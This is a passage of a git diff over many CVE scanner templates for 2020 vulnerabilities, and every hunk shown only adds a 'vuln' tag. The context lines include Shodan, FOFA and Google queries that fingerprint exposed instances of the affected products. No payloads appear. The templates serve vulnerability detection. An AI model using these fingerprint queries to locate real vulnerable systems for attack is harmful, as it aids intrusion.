b/http/cves/2020/CVE-2020-28351.yaml @@ -29,7 +29,7 @@ info: vendor: mitel product: shoretel fofa-query: body="ShoreTel" && icon_hash="268280373" - tags: cve,cve2020,shoretel,xss,mitel + tags: cve,cve2020,shoretel,xss,mitel,vuln flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-28429.yaml b/http/cves/2020/CVE-2020-28429.yaml index 9d8a9329541..9ce0c2bb240 100644 --- a/http/cves/2020/CVE-2020-28429.yaml +++ b/http/cves/2020/CVE-2020-28429.yaml @@ -27,7 +27,7 @@ info: vendor: geojson2kml_project product: geojson2kml framework: node.js - tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive + tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive,vuln variables: filename: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-28653.yaml b/http/cves/2020/CVE-2020-28653.yaml index b783d202c0a..cc7b32f0fc7 100644 --- a/http/cves/2020/CVE-2020-28653.yaml +++ b/http/cves/2020/CVE-2020-28653.yaml @@ -31,7 +31,7 @@ info: google-query: - intitle:"opmanager plus" - intitle:"opmanager" - tags: cve,cve2020,packetstorm,java,deserialization,rce,opmanager,intrusive + tags: cve,cve2020,packetstorm,java,deserialization,rce,opmanager,intrusive,vuln variables: oast: ".{{interactsh-url}}" diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index a65666c2b71..da9264771d9 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -29,7 +29,7 @@ info: product: monitorr shodan-query: http.favicon.hash:"-211006074" fofa-query: icon_hash="-211006074" - tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project,monitorr + tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project,monitorr,vuln variables: string: "CVE-2020-28871" diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 7a6fcdf8996..66874975993 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -28,7 +28,7 @@ info: vendor: canto product: canto framework: wordpress - tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto + tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-29047.yaml b/http/cves/2020/CVE-2020-29047.yaml index f074c977231..b5bc48145ee 100644 --- a/http/cves/2020/CVE-2020-29047.yaml +++ b/http/cves/2020/CVE-2020-29047.yaml @@ -25,7 +25,7 @@ info: product: wp_hotel_booking framework: wordpress fofa-query: body="wp-content/plugins/wp-hotel-booking" - tags: cve,cve2020,wordpress,wp-plugin,wp,wp-hotel-booking,rce,thimpress,vkev + tags: cve,cve2020,wordpress,wp-plugin,wp,wp-hotel-booking,rce,thimpress,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 7199ce68519..21776c05734 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: rainbowfishsoftware product: pacsone_server - tags: cve,cve2020,pacsone,xss,rainbowfishsoftware + tags: cve,cve2020,pacsone,xss,rainbowfishsoftware,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-29214.yaml b/http/cves/2020/CVE-2020-29214.yaml index 1ba61701709..caf2d74982f 100644 --- a/http/cves/2020/CVE-2020-29214.yaml +++ b/http/cves/2020/CVE-2020-29214.yaml @@ -22,7 +22,7 @@ info: max-request: 2 vendor: alumni_management_system_project product: alumni_management_system - tags: cve,cve2020,sqli,auth-bypass,cms,edb,alumni + tags: cve,cve2020,sqli,auth-bypass,cms,edb,alumni,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 950a9efc2a1..27d1eac19df 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -28,7 +28,7 @@ info: product: car_rental_management_system shodan-query: http.html:"car rental management system" fofa-query: body="car rental management system" - tags: cve,cve2020,lfi,car_rental_management_system_project,sqli,vkev + tags: cve,cve2020,lfi,car_rental_management_system_project,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-29279.yaml b/http/cves/2020/CVE-2020-29279.yaml index 4587ee5e938..8db23687764 100644 --- a/http/cves/2020/CVE-2020-29279.yaml +++ b/http/cves/2020/CVE-2020-29279.yaml @@ -25,7 +25,7 @@ info: vendor: 74cms product: 74cms fofa-query: app="骑士-74CMS" - tags: cve,cve2020,74cms,rce,intrusive,file-upload,vkev + tags: cve,cve2020,74cms,rce,intrusive,file-upload,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-29390.yaml b/http/cves/2020/CVE-2020-29390.yaml index bf7a6d34632..a10e691bcab 100644 --- a/http/cves/2020/CVE-2020-29390.yaml +++ b/http/cves/2020/CVE-2020-29390.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"zeroshell" fofa-query: title="zeroshell" google-query: intitle:"zeroshell" - tags: cve,cve2020,zeroshell,rce,router,vkev + tags: cve,cve2020,zeroshell,rce,router,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 9bb731d1e1f..8e6a3652fa2 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -39,7 +39,7 @@ info: - "/wp-content/plugins/eventon/" - /wp-content/plugins/eventon-lite/ google-query: "inurl:\"/wp-content/plugins/eventon/\"" - tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon + tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm,myeventon,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index f53d50dbaea..6e5a73dbab2 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2020,atlassian,jira,lfi,intrusive + tags: cve,cve2020,atlassian,jira,lfi,intrusive,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index 8f17424e6b6..7459a678502 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -34,7 +34,7 @@ info: - http.title:"usg flex 100" fofa-query: title="usg flex 100" google-query: intitle:"usg flex 100" - tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev,vkev + tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index 0a67fcc0eca..189415fc6c9 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: incomcms_project product: incomcms - tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project,vkev + tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index 1e552f01b23..d4ffe8acf51 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cisco product: firepower_threat_defense - tags: cve,cve2020,cisco,packetstorm,vkev + tags: cve,cve2020,cisco,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 683e5597c9c..44bf5edaaf0 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -30,7 +30,7 @@ info: max-request: 2 vendor: cisco product: asa_5505 - tags: cve,cve2020,lfi,kev,packetstorm,cisco,vkev + tags: cve,cve2020,lfi,kev,packetstorm,cisco,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-35131.yaml b/http/cves/2020/CVE-2020-35131.yaml index 9ef680cc98a..1aaaf182763 100644 --- a/http/cves/2020/CVE-2020-35131.yaml +++ b/http/cves/2020/CVE-2020-35131.yaml @@ -26,7 +26,7 @@ info: fofa-query: app="Cockpit" max-request: 2 verified: true - tags: cve,cve2020,rce,cockpit,vkev + tags: cve,cve2020,rce,cockpit,vkev,vuln variables: rand_user: '{{rand_text_alpha(5)}}' diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index a7b9759dcaa..c905442e58d 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -27,7 +27,7 @@ info: vendor: wp-ecommerce product: easy_wp_smtp framework: wordpress - tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce,vkev + tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 727aa29a7e1..139ee457cd3 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mobileviewpoint product: wireless_multiplex_terminal_playout_server - tags: cve,cve2020,wmt,default-login,mobileviewpoint + tags: cve,cve2020,wmt,default-login,mobileviewpoint,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index faa4fa4a5b8..1130e38350c 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -31,7 +31,7 @@ info: - html:"OpenTSDB" - http.html:"opentsdb" fofa-query: body="opentsdb" - tags: cve,cve2020,opentsdb,rce,packetstorm,vkev + tags: cve,cve2020,opentsdb,rce,packetstorm,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index 122f5560391..db2ba54f24f 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: searchblox product: searchblox - tags: cve2020,cve,lfi,searchblox,vkev + tags: cve2020,cve,lfi,searchblox,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index d6d0aa8a605..113a2aabb45 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: advanced_comment_system_project product: advanced_comment_system - tags: cve,cve2020,acs,edb,seclists,lfi,advanced_comment_system_project + tags: cve,cve2020,acs,edb,seclists,lfi,advanced_comment_system_project,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 5c5785e7d4e..1dcc5587a13 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: linksys product: re6500_firmware - tags: cve,cve2020,linksys,rce,oast,router,vkev + tags: cve,cve2020,linksys,rce,oast,router,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 410b1ebc9a5..f24fa18aedc 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: klogserver product: klog_server - tags: cve,cve2020,klog,rce,klogserver + tags: cve,cve2020,klog,rce,klogserver,vuln variables: dummy: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index 5895ce3ae04..3636de4f8df 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: liftoffsoftware product: gateone - tags: cve,cve2020,gateone,lfi,liftoffsoftware + tags: cve,cve2020,gateone,lfi,liftoffsoftware,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index de676846e1d..85ee1ffb30b 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -28,7 +28,7 @@ info: vendor: presstigers product: simple_board_job framework: wordpress - tags: cve,cve2020,authenticated,packetstorm,wp,lfi,wordpress,wp-plugin,wpscan,presstigers + tags: cve,cve2020,authenticated,packetstorm,wp,lfi,wordpress,wp-plugin,wpscan,presstigers,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 018845ff7cb..f89bf3cc699 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: twitter product: twitter-server - tags: cve2020,cve,xss,twitter-server,twitter + tags: cve2020,cve,xss,twitter-server,twitter,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index a3dc2fe45db..bb874f088e4 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: cisco product: firepower_threat_defense - tags: cve,cve2020,xss,cisco,kev,vkev + tags: cve,cve2020,xss,cisco,kev,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index 9a5c21cdcd9..2f82f458ab7 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -33,7 +33,7 @@ info: fofa-query: - icon_hash=688609340 - body="cockpit" - tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo + tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index c42209233f7..d49925a724c 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -35,7 +35,7 @@ info: fofa-query: - icon_hash=688609340 - body="cockpit" - tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo + tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index c709564893c..98b14b44aba 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -33,7 +33,7 @@ info: fofa-query: - icon_hash=688609340 - body="cockpit" - tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo + tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index d686b2ce9a2..93f19013ec1 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -26,7 +26,7 @@ info: vendor: expresstech product: quiz_and_survey_master framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech + tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 7aaa32adc3e..335d764a88c 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -29,7 +29,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 88048b0bc41..813045f5f4c 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -29,7 +29,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated + tags: cve2020,cve,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index 5eb1570a4be..59307641567 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -29,7 +29,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index fb3e2ef33ff..45cd4089fca 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -29,7 +29,7 @@ info: product: rukovoditel shodan-query: http.favicon.hash:-1499940355 fofa-query: icon_hash=-1499940355 - tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated + tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index ab028369c27..1bc96e33ac5 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: cse_bookstore_project product: cse_bookstore - tags: cve,cve2020,sqli,cse,edb,tenable,cse_bookstore_project,vkev + tags: cve,cve2020,sqli,cse,edb,tenable,cse_bookstore_project,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-36155.yaml b/http/cves/2020/CVE-2020-36155.yaml index 580d9f1bb8b..1e15de901f6 100644 --- a/http/cves/2020/CVE-2020-36155.yaml +++ b/http/cves/2020/CVE-2020-36155.yaml @@ -28,7 +28,7 @@ info: publicwww-query: "/wp-content/plugins/ultimate-member" fofa-query: body="/wp-content/plugins/ultimate-member" shodan-query: "http.html:/wp-content/plugins/ultimate-member/" - tags: cve,cve2020,wordpress,wp-plugin,wp,wpscan,ultimate-member,intrusive,privesc,vkev + tags: cve,cve2020,wordpress,wp-plugin,wp,wpscan,ultimate-member,intrusive,privesc,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index 4eeac600529..3d97fb887ec 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2020,jira,atlassian,unauth + tags: cve,cve2020,jira,atlassian,unauth,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-36333.yaml b/http/cves/2020/CVE-2020-36333.yaml index 85049e91e7f..9e4e4e897c0 100644 --- a/http/cves/2020/CVE-2020-36333.yaml +++ b/http/cves/2020/CVE-2020-36333.yaml @@ -22,7 +22,7 @@ info: product: themegrill-demo-importer vendor: themegrill fofa-query: body="/plugins/themegrill-demo-importer" - tags: cve,cve2020,wp,wordpress,wp-plugin,themegrill,vkev + tags: cve,cve2020,wp,wordpress,wp-plugin,themegrill,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index 7e41f92b159..893fa748bd4 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -31,7 +31,7 @@ info: - http.html:'content="Smartstore' - http.html:'content="smartstore' fofa-query: body='content="smartstore' - tags: cve2020,cve,redirect,smartstore + tags: cve2020,cve,redirect,smartstore,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index 70601fbaf56..f1fd24e8912 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -28,7 +28,7 @@ info: vendor: codetipi product: 15zine framework: wordpress - tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi + tags: cve2020,cve,xss,wordpress,wp-theme,wp,wpscan,codetipi,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-36705.yaml b/http/cves/2020/CVE-2020-36705.yaml index 61269c34655..fbaa1e587e4 100644 --- a/http/cves/2020/CVE-2020-36705.yaml +++ b/http/cves/2020/CVE-2020-36705.yaml @@ -26,7 +26,7 @@ info: vendor: tunasite product: adning_advertising framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,angwp,wp,passive,vkev + tags: cve,cve2020,wordpress,wp-plugin,angwp,wp,passive,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-36708.yaml b/http/cves/2020/CVE-2020-36708.yaml index d444cd864b8..58f26555ef7 100644 --- a/http/cves/2020/CVE-2020-36708.yaml +++ b/http/cves/2020/CVE-2020-36708.yaml @@ -33,7 +33,7 @@ info: product: activello kev: true vkev: true - tags: wordpress,rce,cve,cve2020,edb,wpscan,vkev + tags: wordpress,rce,cve,cve2020,edb,wpscan,vkev,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-36719.yaml b/http/cves/2020/CVE-2020-36719.yaml index 8309ef39230..8c50330378d 100644 --- a/http/cves/2020/CVE-2020-36719.yaml +++ b/http/cves/2020/CVE-2020-36719.yaml @@ -23,7 +23,7 @@ info: vendor: cridio product: listingpro fofa-query: body="/wp-content/plugins/listingpro" - tags: cve,cve2020,wp,wp-pluginwordpress,listingpro,passive,vkev + tags: cve,cve2020,wp,wp-pluginwordpress,listingpro,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-36723.yaml b/http/cves/2020/CVE-2020-36723.yaml index 65b413ad01f..3f51b893ad1 100644 --- a/http/cves/2020/CVE-2020-36723.yaml +++ b/http/cves/2020/CVE-2020-36723.yaml @@ -23,7 +23,7 @@ info: vendor: cridio product: listingpro fofa-query: body="/wp-content/plugins/listingpro" - tags: cve,cve2020,wordpress,wp-plugin,wp,exposure,listingpro + tags: cve,cve2020,wordpress,wp-plugin,wp,exposure,listingpro,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-36728.yaml b/http/cves/2020/CVE-2020-36728.yaml index 3332156ceeb..323b65172a0 100644 --- a/http/cves/2020/CVE-2020-36728.yaml +++ b/http/cves/2020/CVE-2020-36728.yaml @@ -25,7 +25,7 @@ info: product: adning_advertising framework: wordpress fofa-query: body="served by Adning" - tags: cve,cve202,wordpress,wp,wp-plugin,intrusive,file-upload,adning,rce,vkev + tags: cve,cve202,wordpress,wp,wp-plugin,intrusive,file-upload,adning,rce,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-36731.yaml b/http/cves/2020/CVE-2020-36731.yaml index e321de83436..8aee16671eb 100644 --- a/http/cves/2020/CVE-2020-36731.yaml +++ b/http/cves/2020/CVE-2020-36731.yaml @@ -25,7 +25,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/flexible-checkout-fields/" publicwww-query: "/wp-content/plugins/flexible-checkout-fields/" - tags: cve,cve2020,wordpress,wp-plugin,wp,flexible-checkout-fields,xss,vkev + tags: cve,cve2020,wordpress,wp-plugin,wp,flexible-checkout-fields,xss,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2020/CVE-2020-36836.yaml b/http/cves/2020/CVE-2020-36836.yaml index 2b8a89dfd53..7bb0eed5b1a 100644 --- a/http/cves/2020/CVE-2020-36836.yaml +++ b/http/cves/2020/CVE-2020-36836.yaml @@ -29,7 +29,7 @@ info: shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/" fofa-query: "body=/wp-content/plugins/wp-fastest-cache/" publicwww-query: "/wp-content/plugins/wp-fastest-cache/" - tags: cve,cve2020,wordpress,wp-plugin,wp-fastest-cache,auth,intrusive,wpfastestcache,vkev + tags: cve,cve2020,wordpress,wp-plugin,wp-fastest-cache,auth,intrusive,wpfastestcache,vkev,vuln variables: target_path: "languages" diff --git a/http/cves/2020/CVE-2020-4427.yaml b/http/cves/2020/CVE-2020-4427.yaml index 5ffbcb7d3df..6d847ed46c9 100644 --- a/http/cves/2020/CVE-2020-4427.yaml +++ b/http/cves/2020/CVE-2020-4427.yaml @@ -25,7 +25,7 @@ info: vendor: ibm product: data_risk_manager shodan-query: title:"IBM Data Risk Manager" - tags: cve,cve2020,ibm,saml,auth-bypass,kev,vkev + tags: cve,cve2020,ibm,saml,auth-bypass,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index 8b74263a21c..bb82f4bfd74 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -33,7 +33,7 @@ info: product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 fofa-query: icon_hash=-399298961 - tags: cve,cve2020,ibm,xxe,disclosure,vkev + tags: cve,cve2020,ibm,xxe,disclosure,vkev,vuln http: - method: POST diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index aad73f26776..756c0eed4b4 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -31,7 +31,7 @@ info: product: hospital_management_system shodan-query: http.html:"hospital management system" fofa-query: body="hospital management system" - tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul + tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 5f01d0bf2a5..75fb79e0e11 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -31,7 +31,7 @@ info: product: hospital_management_system shodan-query: http.html:"hospital management system" fofa-query: body="hospital management system" - tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul + tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul,vuln variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index ab63409e7d7..966a9625c4d 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -30,7 +30,7 @@ info: - http.html:"/_next/static" - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" - tags: cve,cve2020,nextjs,lfi,zeit + tags: cve,cve2020,nextjs,lfi,zeit,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index 8a607a18e2e..a702a987b06 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: phpgurukul product: dairy_farm_shop_management_system - tags: cve,cve2020,sqli,edb,phpgurukul + tags: cve,cve2020,sqli,edb,phpgurukul,vuln http: - raw: diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index bd4e38ef6d2..5bdab48b019 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: spring_cloud_config - tags: cve2020,cve,lfi,springcloud,vmware + tags: cve2020,cve,lfi,springcloud,vmware,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 98fe3ade2da..5a14a3e7d89 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: spring_cloud_config - tags: cve,cve2020,lfi,springcloud,config,traversal,kev,vmware,vkev + tags: cve,cve2020,lfi,springcloud,config,traversal,kev,vmware,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index e36ce97fa79..2d0b84b0744 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: spring_cloud_netflix - tags: cve,cve2020,ssrf,springcloud,vmware,vkev + tags: cve,cve2020,ssrf,springcloud,vmware,vkev,vuln http: - method: GET diff --git a/http/cves/2020/CVE-2020-5766.yaml 